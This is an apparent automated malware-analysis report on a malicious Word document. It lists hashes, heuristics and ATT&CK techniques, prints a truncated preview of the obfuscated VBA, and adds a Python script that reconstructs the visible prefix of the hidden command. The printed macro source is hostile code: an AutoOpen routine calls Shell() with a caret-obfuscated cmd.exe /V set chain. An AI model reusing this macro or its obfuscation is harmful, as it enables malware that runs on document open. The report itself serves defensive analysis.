Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 57a51ec57f2e6f98…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 83.2 KB
Created: 2018-06-03 17:54:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: 34f01151c8a309c3e2c199d8382f9660
SHA-1: bc3329a4943dbb6ac314fd8fcd5a38151a6e8698
SHA-256: 57a51ec57f2e6f988cc144d14ac4ea62fb79da485a612a0399a0eee09b371006
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project contains an Autoopen procedure. Word runs it when the document is opened with macros enabled; it calls UoUUzMqFXcI, which passes a string to Shell(). That string is never written out in one place: it is assembled at run time from short string literals returned by helper functions (AbvnCNRaIh first, then vbTSnTQv, KUwPvt, SGrcZszu, dbwDu, WhEHHW and ETvzXXwPH), with the first character supplied by Chr(kBiBqw + vbKeyC + MXzbUimakZ), which evaluates to "C" because the undeclared operands are Empty and vbKeyC is 67. Every routine is padded with For/Next loops of meaningless arithmetic on undeclared variables, kept from raising by On Error Resume Next. Resolving the part that survives in the preview gives a command line beginning with "Cmd" that chains into a caret-obfuscated %comspec% (cmd.exe) invoked with /V (delayed expansion) and /c, and then builds its real command by storing one- and two-character fragments in environment variables and reading them back with !var! references. The helpers that supply the rest of the string are cut off in the preview, so the final command and any download location cannot be recovered from it; that needs the full macros.bas or dynamic execution. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding below is triggered by the same AutoOpen name; its description covers documents where no VBA project is recovered, which is not the case here, so it adds no separate execution surface.

Heuristics (6)

  • VBA macros detected (medium) OLE_VBA_MACROS, 3 related findings
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The macro source calls Shell(), which starts an arbitrary program or command line
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    An AutoOpen procedure is present; Word runs it when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that any Office document with drawing content carries; it is not a network indicator for this sample.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15319 bytes
SHA-256: 01a926dfb272f814608b67007d0aab385d83c2873e4b2cea9d1b804da55b6d4f
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zZwAfEv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UoUUzMqFXcI()
On Error Resume Next
For JnMJt = QaWBtj To 78571
         pJHkfP = (GLbduI - ChrW(56846 * 63566) * NIEit * CInt(sRqhT + Sqr(1779)) + 40461 - 75525 / 19745 - CDate(MsOSCu - 81798 + 90742 - Hex(Dclfz / 65674)) + (tVolfG * Tan(SQquwv)))
Next
For lYRmiP = OwTRJ To 37507
         uHmqwh = (zzZLF - ChrW(3896 * 93069) * LAszR * CInt(EUsQS + Sqr(45753)) + 59465 - 44247 / 40751 - CDate(WnAYJ - 8366 + 6519 - Hex(OplZsb / 55789)) + (SMnSZ * Tan(BXpnt)))
Next
UoUUzMqFXcI = ZiqMRQZR + Shell(oEmEJMi + Chr(kBiBqw + vbKeyC + MXzbUimakZ) + AbvnCNRaIh + vbTSnTQv + KUwPvt + SGrcZszu + dbwDu + WhEHHW + ETvzXXwPH, oAiGHnmjjj + 0 + PozHumadW)
For jJccdF = SBYsHw To 86773
         cjfcQn = (FSjCu - ChrW(24283 * 71457) * iVKdSF * CInt(JvmmK + Sqr(23635)) + 88728 - 39046 / 60802 - CDate(jZZqK - 22027 + 55096 - Hex(cEKsbL / 54257)) + (YqWwTa * Tan(PWkpid)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For LwEfNn = lXKiq To 80962
         CRTbK = (nEzjCF - ChrW(88227 * 20246) * aWwJk * CInt(MnvzoV + Sqr(74470)) + 35096 - 22858 / 27700 - CDate(kiMFQO - 37298 + 99806 - Hex(HAVdI / 87501)) + (Rzojh * Tan(IpdXd)))
Next
UoUUzMqFXcI
For HAlmU = VPzOJ To 15214
         JflMSS = (vVUUXi - ChrW(91314 * 59127) * Xbskz * CInt(DVOADn + Sqr(57501)) + 6223 - 5862 / 77425 - CDate(EXZWdL - 10619 + 78500 - Hex(mfROpi / 81342)) + (amQXhQ * Tan(QwRPBR)))
Next
End Sub


Attribute VB_Name = "RjqaXEztQ"
Function AbvnCNRaIh()
On Error Resume Next
For NmrBd = FPhIU To 6339
         mVjfa = (jBhvoG - ChrW(33084 * 27646) * VUamVj * CInt(PWmYcs + Sqr(17073)) + 22734 - 73025 / 95258 - CDate(jmCWs - 6355 + 88239 - Hex(UfrCuM / 21793)) + (tNhih * Tan(AFMsCC)))
Next
ktjwhZvf = "md c" + "BmQcIow" + "zT iWBPmKV" + "FhjwQKjw" + "LMnCJ jXDkHH" + "jTJYzI &   " + "  %^c^" + "o^m^S^p^E^" + "c^%     %^c" + "^o^m^S^"
For sVJrCh = qzbXsZ To 30074
         YUsLQ = (PwEOWw - ChrW(71983 * 94697) * ABqHb * CInt(iLsij + Sqr(43169)) + 88126 - 71368 / 18264 - CDate(HXvhrz - 81362 + 73081 - Hex(dWEcj / 71645)) + (tpbWBS * Tan(vpJzhh)))
Next
dhnQSDaS = "p^E^" + "c^" + "%     /" + "V     "
For VNvYO = qPSAK To 9419
         wniiLt = (dDJmop - ChrW(67929 * 99244) * iAJEzH * CInt(IDSMA + Sqr(56535)) + 45802 - 51071 / 22869 - CDate(TpILao - 76031 + 80211 - Hex(RDIjYp / 82162)) + (jABAz * Tan(dVfthr)))
Next
zDkSudCI = "    /c " + "          s" + "et %cXB" + "IVjvBnuwFVFv%=" + "djLRGAnd&&" + "set %in" + "DtNVrFOSIRsf"
For jjasVt = jHLVOT To 80559
         ATtWJ = (oZKvU - ChrW(98265 * 58713) * vvGwjl * CInt(hrDwz + Sqr(84304)) + 53694 - 79010 / 61323 - CDate(fAYULz - 20023 + 65239 - Hex(sJQwBu / 24451)) + (MQPQnE * Tan(TcqaKN)))
Next
tTAXKX = "%=p&&set " + "%CTLs" + "Kdbhk%=o^w" + "&&set %LCDO" + "VOTHwIiIvCq%=GI" + "uobzOB&&set" + " %fXBFDwZErS" + "YXDK%=!%inDtNV" + "rFOSIRsf"
For kiJow = WjvvQ To 72211
         LQuCBm = (PYQWs - ChrW(93194 * 75835) * jJjXj * CInt(YmnMwG + Sqr(37237)) + 56629 - 39838 / 37354 - CDate(BLZCh - 77677 + 47880 - Hex(LwMNn / 92165)) + (SUzmM * Tan(ENmiGp)))
Next
XdOZfiJ = "%!&&s" + "et %MXqaNj" + "BbkXzT" + "chf%=bpGNXm" + "RasE&&set %"
For jjlDz = qlNzB To 39905
         AViMY = (Qunwd - ChrW(65707 * 13928) * zznXa * CInt(TrcLIQ + Sqr(33270)) + 10061 - 31412 / 9881 - CDate(zRBsj - 58861 + 49622 - Hex(GYLsk / 15556)) + (pNtna * Tan(bVrItX)))
Next
jwoKufNOfS = "vUnibPR%" + "=e" + "^r&&se" + "t " + "%jPblDHX" + "R%=!%" + "CTLsKdb" + "hk%!&&set %f" + "PliUCELwEji"
AbvnCNRaIh = ktjwhZvf + dhnQSDaS + zDkSudCI + tTAXKX + XdOZfiJ + jwoKufNOfS
End Function
Function vbTSnTQv()
On Error Resume Next
For HjLii = fQFPNS To 26214
         UaHwr = (maDLc - ChrW(59565 * 87137) * wJjpG * CInt(wXMhJ + Sqr(12415)) + 54644 - 10459 / 69244 - CDate(fUMKGu - 68435 + 18958 - Hex(USjfz / 3064)) + (kIUwf * Tan(LsSwN)))
Next
OBWpLmPT = "z
... (truncated)
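Reconstructing the Shell() argument from the part of the listing the preview shows, as an added analyst script that is not part of this report or its tooling. The SAMPLE below is a constructed copy of the relevant functions from the preview; the helpers that the preview cuts off (vbTSnTQv, KUwPvt, SGrcZszu, dbwDu, WhEHHW, ETvzXXwPH) have no body here, so they contribute the empty string, which is also what VBA yields for any undeclared name. The script strips the padding loops, follows the assignment chain, applies cmd.exe's caret rule, and replays the set chain with the !var! indirection that /V enables. It assumes only VBA's built-in vbKeyC = 67 and Empty semantics for undeclared Variants, and it yields the recoverable prefix of the command, not the complete one.

```python
import re

# Constructed input: the functions that feed Shell(), copied from the macro
# preview above. vbTSnTQv, KUwPvt and the other helpers are truncated on the
# page, so their bodies are omitted; one padding loop is kept on purpose.
SAMPLE = r'''Function UoUUzMqFXcI()
On Error Resume Next
For JnMJt = QaWBtj To 78571
         pJHkfP = (GLbduI - ChrW(56846 * 63566) * NIEit * CInt(sRqhT + Sqr(1779)))
Next
UoUUzMqFXcI = ZiqMRQZR + Shell(oEmEJMi + Chr(kBiBqw + vbKeyC + MXzbUimakZ) + AbvnCNRaIh + vbTSnTQv + KUwPvt + SGrcZszu + dbwDu + WhEHHW + ETvzXXwPH, oAiGHnmjjj + 0 + PozHumadW)
End Function
Sub Autoopen()
On Error Resume Next
UoUUzMqFXcI
End Sub
Function AbvnCNRaIh()
On Error Resume Next
ktjwhZvf = "md c" + "BmQcIow" + "zT iWBPmKV" + "FhjwQKjw" + "LMnCJ jXDkHH" + "jTJYzI &   " + "  %^c^" + "o^m^S^p^E^" + "c^%     %^c" + "^o^m^S^"
dhnQSDaS = "p^E^" + "c^" + "%     /" + "V     "
zDkSudCI = "    /c " + "          s" + "et %cXB" + "IVjvBnuwFVFv%=" + "djLRGAnd&&" + "set %in" + "DtNVrFOSIRsf"
tTAXKX = "%=p&&set " + "%CTLs" + "Kdbhk%=o^w" + "&&set %LCDO" + "VOTHwIiIvCq%=GI" + "uobzOB&&set" + " %fXBFDwZErS" + "YXDK%=!%inDtNV" + "rFOSIRsf"
XdOZfiJ = "%!&&s" + "et %MXqaNj" + "BbkXzT" + "chf%=bpGNXm" + "RasE&&set %"
jwoKufNOfS = "vUnibPR%" + "=e" + "^r&&se" + "t " + "%jPblDHX" + "R%=!%" + "CTLsKdb" + "hk%!&&set %f" + "PliUCELwEji"
AbvnCNRaIh = ktjwhZvf + dhnQSDaS + zDkSudCI + tTAXKX + XdOZfiJ + jwoKufNOfS
End Function
'''

# VBA built-in constants the sample uses (vbKeyC is the key code for "C").
# Every other bare identifier is an undeclared Variant, i.e. Empty: 0 in
# arithmetic and "" in string concatenation.
VB_CONSTS = {"vbKeyC": 67}

def strip_junk_loops(src):
    """Remove the For ... Next padding loops: arithmetic on undefined variables,
    stored to names nobody reads, with On Error Resume Next eating the errors."""
    return re.sub(r"^For .*?^Next\n", "", src, flags=re.M | re.S)

def split_top(expr, sep):
    """Split expr on sep, ignoring separators inside quotes or parentheses."""
    parts, cur, depth, quoted = [], "", 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            depth += (ch == "(") - (ch == ")")
            if ch == sep and depth == 0:
                parts.append(cur)
                cur = ""
                continue
        cur += ch
    parts.append(cur)
    return [p.strip() for p in parts]

def vb_number(expr):
    """Sum of integer literals, VB constants and Empty (0) identifiers."""
    return sum(int(p) if p.isdigit() else VB_CONSTS.get(p, 0) for p in split_top(expr, "+"))

def vb_string(expr, env, depth=0):
    """String VBA builds for a '+' concatenation, following names through env."""
    if depth > 64:
        raise RecursionError("assignment cycle in macro")
    out = ""
    for part in split_top(expr, "+"):
        if part.startswith('"') and part.endswith('"'):
            out += part[1:-1].replace('""', '"')
        elif part.startswith("Chr(") and part.endswith(")"):
            out += chr(vb_number(part[4:-1]))
        elif part in env:
            out += vb_string(env[part], env, depth + 1)
        # anything else is Empty: undeclared, or a helper truncated on the page
    return out

def shell_argument(src):
    """Resolve the first argument of the Shell() call in the macro source."""
    clean = strip_junk_loops(src)
    env = {m.group(1): m.group(2) for m in re.finditer(r"^(\w+) = (.+)$", clean, flags=re.M)}
    call = re.search(r"Shell\((.*)\)", clean)
    return vb_string(split_top(call.group(1), ",")[0], env)

def cmd_unescape(cmdline):
    """cmd.exe caret rule: ^x is the literal character x, so
    %^c^o^m^S^p^E^c^% is read as %comSpEc% (COMSPEC, the path of cmd.exe)."""
    return re.sub(r"\^(.)", r"\1", cmdline)

def set_chain(cmdline):
    """Replay the 'set NAME=VALUE&&set ...' chain. With /V, a !NAME! inside a
    later value is expanded when that set runs, so the indirection resolves."""
    values = {}
    for name, value in re.findall(r"set (\S+?)=([^&]*)", cmdline):
        values[name] = re.sub(r"!([^!]+)!", lambda m: values.get(m.group(1), m.group(0)), value)
    return values

if __name__ == "__main__":
    print(" ".join(cmd_unescape(shell_argument(SAMPLE)).split()))
    print(set_chain(cmd_unescape(shell_argument(SAMPLE))))
```

The replayed chain stores p, ow and er and the two !...! references read p and ow back, so the visible part is assembling a longer word out of fragments; what that word is lies in the truncated helpers. The variable names are themselves wrapped in percent signs: on a command line (unlike in a batch file) cmd.exe leaves an undefined %name% untouched, so the names survive the first expansion pass literally and are only dereferenced by the delayed !...! form, which is why the macro needs /V.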